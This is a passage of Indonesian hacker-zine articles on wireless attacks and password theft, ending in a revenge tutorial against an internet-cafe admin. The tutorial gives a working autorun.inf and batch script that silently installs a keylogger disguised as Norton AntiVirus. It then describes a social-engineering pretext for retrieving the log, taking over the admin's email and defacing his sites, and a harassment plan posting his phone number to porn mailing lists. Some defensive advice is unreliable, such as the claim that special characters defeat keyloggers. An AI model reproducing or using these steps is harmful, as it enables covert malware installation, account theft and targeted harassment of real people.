“Man-in-the-middle”. Sebenarnya inilah sebuatn bagi sang penyusup. Serangan Man-in-the-Middle dilakukan dengan mengelabui koneksi VPN antara komputer pengguna resmi dan access point dengan cara memasukkan komputer lain di antara keduanya sebagai pancingan. Jenis serangan ini hampir sama dengan jenis serangan pada jaringan kabel. Program yang digunakan juga sama, kecuali perangkat wirelessnya. Dengan menggunakan sebuah program, penyusup mampu memosisikan diri di antara lalu lintas komunikasi data dalam jaringan nirkabel.


Serangan seperti ini mudah dilakukan dengan bantuan software yang tepat, misalnya saja Wireless LANJack atau AirJack. Akan tetapi serangan jenis ini juga relatif mudah dicegah dengan IDS yang handal yang mampu memonitoring 24 jam sehari.


:: Denial of Service (DoS)

--------------------------
Hohoho.. inilah serangan yang paling ditakutkan oleh para Admin. Denial Of service memang relatif sulit untuk dicegah. Serangan ini dapat menimbulkan downtime pada jaringan. Tool gratisan seperti Wireless LANJack dan hunter_killer mampu melakukan serangan ini. Serangan ini bisa saja diarahkan pada user biasa agar user tersebut tidak bisa terkoneksi dengan suatu access point. Tujuannya tak lain adalah supaya tidak ada pengguna yang bisa menggunakan layanan jaringan Karena adanya kekacauan lalulintas data (penolakan layanan).


Seorang penyusup bisa saja mengelabui Extensible Authentication Protocol (EAP) untuk melakukan serangan DoS terhadap suatu server. Aksi ini dibarengi dengan melakukan flooding data. Dengan demikian maka tidak ada satu pun user yang bisa melakukan koneksi dengan layanan jaringan.

:: Network Injection

---------------------
Aapbila sebuah access point terhubung dengan jaringan yang tidak terfilter secara baik, maka penyusup berpotensi untuk melakukan aksi boardcast – seperti spanning tree (802.1D), OSPF, RIP, dan HSRP. Dalam kondisi ini, maka semua perangkat jaringan akan sibuk dan tidak mampu lagi bekerja sebagaimana mestinya. Routing attack juga termasuk dalam serangan jenis ini. Sang penyusup bisa melakukan hal ini dengan mudah menggunakan program seperti IRPAS, yang dipergunakan untuk melakukan injeksi data pada update routing di jaringan, mengubah gateway, atau menghapus table routing yang ada.




[4]. Amankan Jaringan Wireles Anda!!

------------------------------------


Solusi berikut memang tidak akan membuat jaringan anda 100% secure. Ingat kata-kata klasik... di dunia yang tidak sempurna ini, tidak ada sesuatu yang 100% secure! Hal-hal berikut ini hanya akan meminimalisir serangan yang berpotensi untuk merusak jaringan anda.

1. Ubahlah Password Default Access Point. Banyak serangan yang terjadi adalah karena segalanya dibiarkan pada setting default, termasuk password. Kebanyakan penyerang biasanya akan berfikiran hal yang satu ini, yaitu berharap bahwa sang target belum mengubah password defaul Access Point.

2. Ubahlah IP default. Dahulu hal ini kurang memungkinkan untuk dilakukan. Namun dewaas ini sudah banyak merek-merek Access Point yang memiliki fasilitas ini.

3. Aktifkan metode enkripsi. Pergunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK).Berikan juga password yang "aman", dalam artian sulit ditebak dan tidak memiliki arti. Anda juga bisa memanfaatkan enkripsi WPA dengan Temporal Key Integrity Protokol.

4. Matikan fungsi Broadcast SSID. Dengan demikian, maka SSID Anda tidak akan terdeksi pada proses War Driving. Akan tetapi.. kabar buruknya (atau kabar baik??), saat ini sudah ada beberapa aplikasi scanning yang bisa menditeksi SSID yang terhidden. Yeah, walaupun demikian anda tetap bisa melindungi SSID dengan cara merubah nama SSID default dengan nama SSID yang sulit ditebak.

5. Gunakan MAC Address Filtering. Hal ini berguna untuk mengurangi aktivitas penysupan.

6. Non Aktifkan DHCP. Gunakan IP Static dengan nilai yang jarang digunakan.

7. Gunakan Security tambahan seperti CaptivePortal atau aplikasi lainnya yang di inject pada firmware Access Point.

8. Pergunakan software seperti Mc Afee Wireless Home Security untuk melakukan Access Point Monitoring via Client.




[5]. Istilah-istilah

--------------------


1. Wi-Fi atau WiFi (Wireless Fidelity)
Wi-Fi atau adalah nama lain yang diberikan untuk produk yang mengikuti spesifikasi 802.11. Sebagian besar pengguna komputer lebih mengenal istilah Wi-Fi card/adapter dibandingkan dengan 802.11 card/adapter. Wi-Fi merupakan merek dagang, dan lebih popular dibandingkan kata “IEEE 802.11”.

2. Channel
Pita frekuensi andaikan sebuah jalan. Channel inilah yang berfungsi seakan-akan sebagi jalur-jalur pemisah pada jalan tersebut. Peralatan 802.11a bekerja pada frekuensi 5,15 - 5,875 GHz, sedangkan peralatan 802.11b dan 802.11g bekerja pada frekuensi 2,4 - 2,497 GHz. Jadi , 802.11a menggunakan pita frekuensi lebih besar dibandingkan 802.11b atau 802.11g. Semakin lebar pita frekuensi, semakin banyak channel yang tersedia.


3. MIMO
MIMO (Multiple Input Multiple Output) merupakan teknologi Wi-Fi terbaru. MIMO dibuat berdasarkan spesifikasi Pre-802.11n. Kata ”Pre-” menyatakan “Prestandard versions of 802.11n”. MIMO menawarkan peningkatan throughput, keunggulan reabilitas, dan peningkatan jumlah klien yg terkoneksi. Beberapa keunggulan lain dari MIMO adalah:



- Daya tembus MIMO terhadap penghalang lebih baik.

- Jangkauannya lebih luas. Access Point MIMO dapat menjangkau berbagai perlatan Wi-Fi yg ada disetiap sudut ruangan.

- Access Point MIMO dapat mengenali gelombang radio yang dipancarkan oleh adapter Wi-Fi 802.11a/b/g.

- MIMO mendukung kompatibilitas mundur dengan 802.11 a/b/g. Peralatan Wi-Fi MIMO dapat menghasilkan kecepatan transfer data sebesar 108Mbps.


4. WEP
WEP (Wired Equivalent Privacy) merupakan salah satu fitur keamanan/sekuriti yang bersifat build-in pada peralatan Wi-Fi. Gelombang radio yang dipancarkan adapter Wi-Fi dapat diterima oleh semua peralatan Wi-Fi yang berada di sekitarnya. Hal inilah yang menjadi ancaman serius karena dalam kondisi ini informasi informasi bisa dengan mudah ditangkap oleh pihak-pihak yang tidak semestinya. Oleh skarena itulah Wi-Fi dibuat dengan beberapa jenis enkripsi : 40 bit, 64 bit, 128 bit dan 256 bit. Namun semakin tinggi tingkat keamanannya, maka penurunan throughput data juga semakin besar.

5. SSID
SSID (Service Set IDentifier) merupakan identifikasi atau nama untuk jaringan wireless. Setiap peralatan Wi-Fi harus menggunakan SSID tertentu. Suatu peralatan Wi-Fi dianggap ebrada dalam satu jaringan apabila mengunakan SSID yang sama. Sama seperti password, SSID bersifat case-sensitive yaitu huruf kapital dan huruf kecil dibedakan.

6. SES
Selama ini kesulitan yang sering dialami oleh kebanyakan orang ialah dalam hal setup security jaringan. Padahal hal ini merupakan hal yang sangat penting dalam dunai jaringan. Karena itulah diciptakan SES (SecureEasySetup). Kini, hanya dengan menekan satu tombol, SES secara otomatis memberikan SSID dan kode sekuriti ke router dan adapter serta menerapkan security WPA (Wireless Protected Access). Untuk menggunakan SES, pengguna hanya perlu menekan tombol SES pada router, kemudian pada client. Cukup mudah, adn kedua perangkat tersebut kini sudah memiliki jalur lalu-lintas yang aman.

Bagaimana Cara Para Hacker mendapatkan Password Anda

: Table oF Contents :
---------------------
0 [0XFF00000] Preface
0 [0XFFF0000] Bagaimana Mendapatkannya?
[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling
0 [0XFFFF000] Penutup
0 [0XFFFFF00] Referensi
0 [0XFFFFFF0] Shoutz
0 [0XFFFFFFF] Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]



0 [0XFF00000] Preface

Pencurian password, pengambilalihan account, merupakan hal yang sering terjadi
di dunia cyber. Bukan hal yang sulit untuk melakukannya, namun banyak para
newbie yang terus saja bertanya-tanya.. "Bagaimana cara mendapatkan password
email orang lain?" atau pertanyaan yang paling sering saya terima ialah..
"Bagaimana cara anda mendapatkan password saya?" :P

Untuk pertanyaan-pertanyaan itulah artikel ini ditulis, semoga bisa menambah
wawasan anda dan membuka pikiran anda tentang betapa pentingnya menjaga
account saat berada di tempat-tempat rawan.


0 [0XFFF0000] Bagaimana Mendapatkannya?


Ada banyak cara untuk mendapatkan suatu password. Beberapa diantaranya tidak
membutuhkan keahlian khusus. Berikut adalah cara-cara yang paling umum dan
paling sering digunakan:

[1]. Social Engineering
[2]. KeyLogger
[3]. Web Spoofing
[4]. Menghadang Email
[5]. Password Cracking
[6]. Session Hijacking
[7]. Menjadi Proxy Server
[8]. Memanfaatkan Kelalaian User Dalam Penggunaan Fitur Browser
[9]. Googling


[1]. Social Engineering

Social Engineering adalah nama suatu tehnik pengumpulan informasi dengan
memanfaatkan celah psikologi korban. Atau mungkin boleh juga dikatakan sebagai
"penipuan" :P Sosial Engineering membutuhkan kesabaran dan kehati-hatian agar
sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikiran
seperti sang korban.

Social Engineering merupakan seni "memaksa" orang lain untuk melakukan sesuatu
sesuai dengan harapan atau keinginan anda. Tentu saja "pemaksaan" yang
dilakukan tidak secara terang-terangan atau diluar tingkah laku normal yang
biasa dilakukan sang korban.

Manusia cenderung untuk percaya atau mudah terpengaruh terhadap orang yang
memiliki nama besar, pernah (atau sedang berusaha) memberikan pertolongan,
dan memiliki kata-kata atau penampilan yang meyakinkan. Hal ini sering
dimanfaatkan pelaku social engineering untuk menjerat korbannya. Seringkali
sang pelaku membuat suatu kondisi agar kita memiliki semacam ketergantungan
kepadanya.Ya,tanpa kita sadari dia mengkondisikan kita dalam suatu masalah dan
membuat ( seolah - olah hanya ) dialah yang bisa mengatasi masalah itu. Dengan
demikian,tentu kita akan cenderung untuk menuruti apa yang dia instruksikan
tanpa merasa curiga.

Sosial Engineering adakalanya menjadi ancaman serius. Memang sepertinya tidak
ada kaitan dengan teknologi, namun sosial engineering tetap layak diwaspadai
karena bisa berakibat fatal bagi sistem anda. Why?? Karena bagaimanapun juga
suatu komputer tetap saja tidak bisa lepas dari manusia. Ya, tidak ada satu
sistem komputerpun di muka bumi ini yang bisa lepas dari campur tangan
manusia. ehebat apapun pertahanan anda, jika anda sudah dikuasai oleh attacker
melalui social engineering, maka bisa jadi anda sendirilah yang membukakan
jalan masuk bagi sang attacker.

# Contoh Social Engineering sederhana:
Baca Attachment[Pembalasan Untuk Sang Admin - SOcial Engineering]


[2]. KeyLogger

KeyLogger adalah software yang dapat merekam aktivitas user. Hasil rekaman itu
biasa disimpan berupa teks atau gambar. KeyLogger bekerja berdasarkan ketukan
keyboard user. Aplikasi ini mampu mengenali form-form sensitif seperti form
password misalnya.

Ada cara aman untuk menghindari keyloger:
1. Gunakan password dengan karakter special seperti !@#$%^&*(){}[]. Kebanyakan
keyloger akan mengabaikan karakter ini sehingga sang pelaku (pemasang
keyloger) tidak akan mendapatkan password anda yang sebenarnya.

2. Persiapkan password dari rumah, simpan dalam bentuk teks. Saat ingin
memasukkan password, tingal copy-paste ajah. Keyloger akan membaca password
anda berdasarkan ketukan keyboard. Namun cara ini agak beresiko. Mengapa?
karena saat anda melakukan copy, data anda akan tersimpan di clipboard. Saat
ini banyak dijumpai software-software gratis yang bisa menampilkan data dalam
clipboard.


[3]. Web Spoofing

Masih ingat kasus pecurian Account sejumlah nasabah Bank BCA? Ya, itulah salah
satu contoh nyata dari Web spoofing. Inti dari tehnik ini ialah dengan
memanfaatkan kesalahan user saat mengetikkan alamat situs pada address bar.
Pada dasarnya, Web Spoofing adalah usaha untuk menipu korban agar mengira dia
sedang mengakses suatu situs tertentu, padahal bukan.

Pada kasus bank BCA, pelaku membuat situs yang sangat mirip dan identik dengan
situs aslinya sehingga sang korban yang terkecoh tidak akan merasa ragu
mengisikan informasi sensitif seperti user name dan Passwordnya. Padahal,
karena situs tersebut adalah situs tipuan, maka semua informasi berharga tadi
terekam oleh webserver palsu, yaitu milik sang pelaku.


[4]. Menghadang Email

Menghadang email? Ya, dan sangat mudah untuk melakukan hal ini. Salah satu
cara adalah dengan menggunakan mailsnarf yang terdapat pada utility dsniff.
Cara kerja Mailsnarf adalah dengan menghadang paket data yang lewat di
Internet dan menyusunnya menjadi suatu email utuh.

Dsniff dan mailsnift merupakan software bekerja atas dasar WinPcap (setara
dengan libcap pada Linux) yaitu suatu library yang menangkap paket-paket data.
Paket-paket yang ditangkap ini akan disimpan dalam bentuk file oleh Windump,
sedangkan Dsniff dan MailSnarf bertindak lebih jauh lagi yaitu menganalisa
paket-paket data ini dan menampilkan password (dsniff) atau isi email
(mailsnarf).

Baca artikel terkait pada arsip lama :)


[5]. Password Cracking

"Hacking while sleeping." itulah ungkapan yang biasa dipakai oleh orang-orang
yang melakukan password cracking. Mengapa? Karena pada umumnya dibuthkan waktu
yang lama untuk melakukan pasword cracking. Bisa berjam-jam, bahkan berhari -
hari! Semua itu tergantung dari target, apakah sang target menggunakan
password yang umum, password memiliki panjang karakter yang tidak biasa, atau
password memiliki kombinasi dengan karakter-karakter special.

Salah satu software yang biasa digunakan untuk melakukan hal ini ialah dengan
mengunakan Brutus, salah satu jenis software remote password cracker yang
cukup terkenal. Brutus bekerja dengan teknik dictionary attack atau
bruce-force attack terhadap port-port http, POP3,ftp, telnet, dan NetBIOS.

Dictionary Attack bekerja dengan mencobakan kata-kata yang ada dalam kamus
password. Sedangkan brute - force attack bekerja dengan mencobakan semua
kombinasi huruf, angka, atau karakter.

Brute Force Atack bekerja sangat lambat dan membutuhkan waktu yang lama
tergantung dari jenis spesifikasi komputernya dan panjang karakter
passwordnya. Saat ini telah banyak situs yang menutup akses terhadap akses
terhadap usaha login yang secara terus-menerus tidak berhasil.

Jika anda ingin melakukan password Cracking, silahkan pilih - pilih sendiri
aplikasinya di halaman Member - spyrozone.net.


[6]. Session Hjacking

Session hijacking dewasa ini semakin marak dikalangan para attacker. Session
Hijacking biasa dilakukan dengan melakukan peniruan cookies. Jadi pada
intinya, kita harus bisa meniru cookies sang korban untuk mendapatkan sesi
loginnya.

Lalu bagaimana cara mendapatkan cookies sang korban?
1. Dengan analisa Cookies. Cara ini relatif sulit dilakukan.
2. Mencuri Cokies.
Misalnya Sang Attacker ingin mendapatkan account si A. Sang Attacker bisa
dengan mudah membuat semacam script Java Script yang disisipkan dalam email
untuk dikirim ke korban.Saat korban membuka email itu, tanpa sadar cookiesnya
akan dicuri dan direkam ke suatu webserver dengan memanfaatkan suatu script
PHP.

Belakangan ini yang paling sering menjadi incaran adalah account Friendster.
Ada yang menyisipkan suatu scipt lewat testimonial, ada yang menyisipkannya di
profilnya sendiri untuk mencuri cookies sang korban dan lain sebagainya. Saya
memiliki tips untuk ini:

1. Jangan menggunakan browser InternetExplorer saat ingin membuka profil orang
lain. Catat alamat profil yang ingi anda lihat,logout terlebih dahulu dari
account anda dan bersihkan semua cookies, baru kemudian bukalah profil
Friendster tujuan.
2. Ketika menerima testimonial, periksa terlebih dahulu source codenya. Apakah
disana terdapat script asing atau kata-kata yang identik dengan pembajakan
seperti : "HACKED", "DEFACED", "OWNED".. dll.. Jika ragu-ragu....... reject
ajah..
3. Waspada ketika tanpa suatu alasan yang jelas tiba-tiba anda logout dengan
sendirinya dari account anda. Saat anda diminta memasukkan username dan
password, lihat dulu addressbar anda! apakan anda sedang berada di situs
yang semestinya atau tidak. Periksa source code halaman tersebut.Lihat pada
form action, kemana informasi anda nantinya akan dikirim.

Sebenarnya session hijacking bisa dicegah jika saja sang penyedia layanan
memperhatikan hal-hal berikut:

1. Menetapkan session identifier yang unik
2. Menetapkan sistem identifier berpola acak
3. Session identifier yang independen
4. Session identifier yang bisa dipetakan dengan koneksi client side.

Fenomena lain adalah,hingga saat artikel ini diterbitkan,ternyata masih banyak
dijumpai para user yang tidak melakukan sign out setelah membuka accountnya.
Dengan demikian, orang lain yang mengunakan komputer itu dan membuka website
yang sama dengan yang telah dibuka oleh orang pertama akan otomatis login ke
account sang korban.


[7]. Menjadi Proxy Server

Kita bisa mengumpulkan informasi dengan menjadi proxy server bagi korban
untuk dapat berselancar. Dengan menjadi proxy server, seluruh identitas sang
peselancar bisa menjadi milik kita.


[8]. Memanfaatkan Kelalaian user dalam penggunaan fitur browser

Setiap browser tentunya memiliki fitur yang ditujukan untuk kemudahan dan
kenyamanan penggunanya dalam berselancar. Diantaranya ialah dengan adanya
cache dan Password Manager.

Di Internet tentunya banyak suatu website yang isinya tidak berubah dalam
beberapa hari (Contohnya spyrozone.net nich.. hehehe ;) Nah, untuk situs yang
seperti ini cache menjadi hal yang sangat berguna. Cache akan menyimpan
file-file hasil browsing sehinga nantinya jika anda berkunjung lagi ke situs
tersebut browser tidakperlu lagi melakukan download untuk kedua kalinya dari
server sehingga setiap halaman situs yang telah anda buka sebelumnya akan
terbuka dengan lebih cepat. Semua itu biasanya diatur oleh header time to
live.

Lho, bagaimana dengan situs-situs penyedia berita yang selalu up to date?
Untuk site yang seperti itu, time to live-nya akan di set=0 sehinga nantinya
anda akan terus melakukan download setiap kali berkunjung.

Cukup nyaman bukan? Ya, tapi ancaman mulai timbul. Cobalah kini anda jelajahi
opsi-opsi yang berkaitan dengan cache pada browser anda. Tentu anda bisa
menemui bahwa ada fasilitas untuk menentukan berapa besarnya file temporary
yang bisa disimpan di harddisk. Cari juga lokasi dimana file-file tersebut
akan disimpan.

Coba anda buka folder tersebut, anda akan menemui file-file html & file-file
gambar dari site-site yang sudah anda kunjungi. Pada Browser IE, anda bisa
melihat lokasi file cache dengan menjelajahi menu Tools ---> Internet options
---> Settings

Lalu apa yang bisa didapatkan?? toh cuma file-file "sampah"?? Hmm... sekarang
coba anda copy semua file yang ada di sana ke suatu folder. Lalu bukalah
salah-satu file htmlnya. Jika itu komputer publik,anda bisa mengetahui situs
apa saja yang telah diakses oleh oleh orang sebelum anda.

Hmm.. hanya dengan melihat file temporary anda bahkan bisa melihat password
dan dll.Banyak saya temui situs yang menyimpan password dan menampilkannya
pada url. Tentunya anda juga pasti sering membacanya di berbagai tutorial.

Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password.
Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak
dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan
atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi
YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca:
tidak mau tau) apa maksud dari kotak dialog itu.

Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah
mendapatkan password korban dengan memasuki menu Tools ---> Options --->
Security --> Saved password.

Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera.
Saat anda memasukkan user name dan password pada suatu form dan menekan
tombol submit, opera secara default akan meminta konfirmasi kepada anda
apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan
lagi... kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi "YES".

Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat
situs apa saja yang telah diakses oleh user, arahkan browser ke situs
tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan
BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis
terisi dengan user name korban lengkap dengan passwordnya ;D (It's fun
enough.. ;)

Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!


[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor - nomor kartu
kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;)
Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu
yang berkaitan dengan user name dan password, anda bisa memanen ratusan
password user melalui google. Tapi sekarang tampaknya anda harus gigit jari
jika menggunakan cara diatas ;D

Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu
Google Code Search. Ancaman baru mulai timbul, "si pintar" ini kini dapat
meng-crawl hingga kepada archive file yang berada di public directory web
server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di
dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang
kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar
situs anda bisa hidup lebih lama. Kalo nggak... yach.. tunggu ajah ada orang
yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif
dari web server anda. dan jika itu sudah terjadi... maka bersiaplah.. "taman
bermain" anda akan diambil alih olehnya..


0 [0XFFFF000] Penutup

Wew... ada banyak cara bukan untuk mendapatkan account orang lain?? So, selalu
berhati-hatilah. Waspada selalu saat berada di tempat umum, bahkan saat berada
di komputer pribadi anda sekalipun karena bisa jadi teman anda atau siapapun
yang meminjam komputer anda memiliki tujuan yang kurang baik.

Sekian, semoga bermanfaat dan bisa menambah pengetahuan anda :)


0 [0XFFFFF00] Referensi

- securityfocus[dot]com
- phrack[dot]org
- spyrozone[dot]tk
- google[dot]com


0 [0XFFFFFF0] Shoutz:

- Vindika Anastasya & Vermouth Anastasya.. The deepest Love I'v ever had.. :)
- All Crack Sky Staff! Hey there.. :)
- ECHOERS, SECTOR-S (wake up guys!!)
- EVILratE, PushMOV, MyzTX, Dr3, Lun4, Clust3r, RX-259, RX-290, RX-313, RX-147
- Mr.Rio, PramayunTA, Alfian, Andien, Taurista, Bachtiar, EQ, WisNU, Arman,
Dani, Rara, Icha, Prita, Vivi, Nabiel, Tika, Kemas, Bomy, Arbi, Tunjung,
Krishna, Rizki..
- All my friend in SMAN 2 SIDOARJO
- All member of www.spyrozone.net .. stay Alert in SPYRO ZONE!!


0 [0XFFFFFFF] Attachment:

Berikut adalah contoh social engineering sederhana. Saya ambil dari tulisan
saya yang berjudul "Pembalasan Untuk Sang Admin"-www.spyrozone.net. Enjoy... ;)


------------------------------------------------------------------


Pembalasan Untuk Sang Admin - SOcial Engineering



May 12, 2006 jam 21:16 malam di depan RedHat tercinta dengan segelas Heineken
Author: SPYRO KiD
CopyLeft (c) 2006 by www.spyrozone.net


|---[Table of Contents

1. Introduction
2. Serangan pertama
3. Serangan kedua
4. Hari pembalasan
5. Cara pencegahan
6. Penutup


1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa
layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan)
disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah
satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala
keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis
exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para
newbie.

Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai
tak jarang lupa diri :P Namun semua itu tentunya tidak bertahan lama. Admin
menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan
melarang user untuk melakukan segala bentuk transfer file dari media
penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih
dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan
mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga
exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi
"rongsokan" tak berguna.

Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan
bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang
100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar
ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin.
Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan
orang... mendapatkan password sang admin. Partner kita kali ini adalah
navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu
dapatkan suka-suka dengan harga cuma-cuma di halaman member www.spyrozone.net
kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah -
langkah berikut:

---[1 Bukalah Notepad kemudian ketik baris script berikut:

[autorun]
open=nav.bat

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file] [new] lalu ketik
script berikut:

@echo off
echo Norton Antivirus 2006
echo Scanning disk drive...
echo Please wait...
copy navw32.exe %windir%\navw32.exe
call %windir%\navw32.exe
echo.
echo.
echo.
echo.
echo.
echo.
echo.
echo. Scanning complette! No virus threat detected!
echo.
cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada
form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file microsoft word documents (bisa diganti dengan
file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file,
semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file
diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti
biasa dan jangan gugup selayaknya para koruptor yang sering nampang di
satasion-stasion TI-PI tanpa rasa malu. Setelah kamu login ke billing komputer
user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau
transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer
nomor blablabla."

Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf
akan memproses file nav.bat ---> file nav.bat akan menduplikasi file
navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah
terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama
navw32.dll beratribut hidden.

Perlu diketahui bahwa keyloger ini tidak akan menampilkan kotak dialog dalam
bentuk apapun! So, nggak usah khawatir bakal ketahuan ;)

Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi - lagi)
kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis
menang togel.

Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows
sang admin? Ikuti langkah-langkah pada serangan kedua.


3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkahlakulah secara
wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai
berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa
lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan :) katakan
pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Menurut pesan
Error yang muncul, file navw32.dll yang berada di directory windows hilang.
File tersebut beratribut hidden. Tolong doong copykan dari komputer ini.
Kebetulan versi windowsnya sama dengan komputer saya.."

Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu.
Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All
files pada Folder Options dan mengcopy-kan file navw32.dll dari directory
windows tanpa menyadari bahwa file tersebut bukan file system, namun file
hasil rekaman keyloger.

Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan
beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik
2x pada file lalu ketika muncul kotak dialog open with, klik opsi select
program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari
password emailnya dan kamu bisa menuju pada hari pembalasan.


4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin
sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet.
Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah
warnet yang buka 24 jam.

Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin.
Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar
dengan email tersebut. Subscribe sebanyak-banyaknya.

Hohoho.. lalu apa lagi nich?? Kalau sang admin punya blog/website pribadi/
account Friendster.. tentu kamu dengan mudah mendapatkan semua password itu
dengan fasilitas forgot password. Kebanyakan penyedia layanan seperti itu akan
mengirimkan password via email. So, setelah dapat semuanya... heheh... DEFACE
ajah ;) Tapi inget lho, halaman lama harus tetap di backup dan jangan merubah
password apapun!!

Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan
dilakukan deech..). Daftarkan emailnya ke berbagai situs - situs porno dan
postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya
jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no
telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata- kata
yang yahuud!! ;D

Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling
mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun!
Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam
dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa
maksudnya ;D

Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin
akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari
berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan
milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unsubcribe dari
milis-milis tersebut, telepon rumahnya masih terus - terusan menjerit - jerit
dengan jeritan indah :D


5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka
setiap kamu menerima CD dari siapapun..
1. Buka windows explorer
2. Tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive.
3. Setelah CD masuk,tetap tekan tombol shift sampai kira-kira 25 detik.Setelah
itu kamu bisa melepas tombol shift dan mengaksesnya melalui panel sebelah kiri
windows Explorer. Klik pada area folder tree, jangan pada daftar drive sebelah
kanan karena fitur autorun akan aktif.

Dan ingat, jangan terlalu percaya pada siapapun! Ada begitu banyak orang tidak
terduga di sekitar anda!!


6. Penutup

---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak
yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana
namun dampaknya.. bisa anda bayangkan sendiri ;)

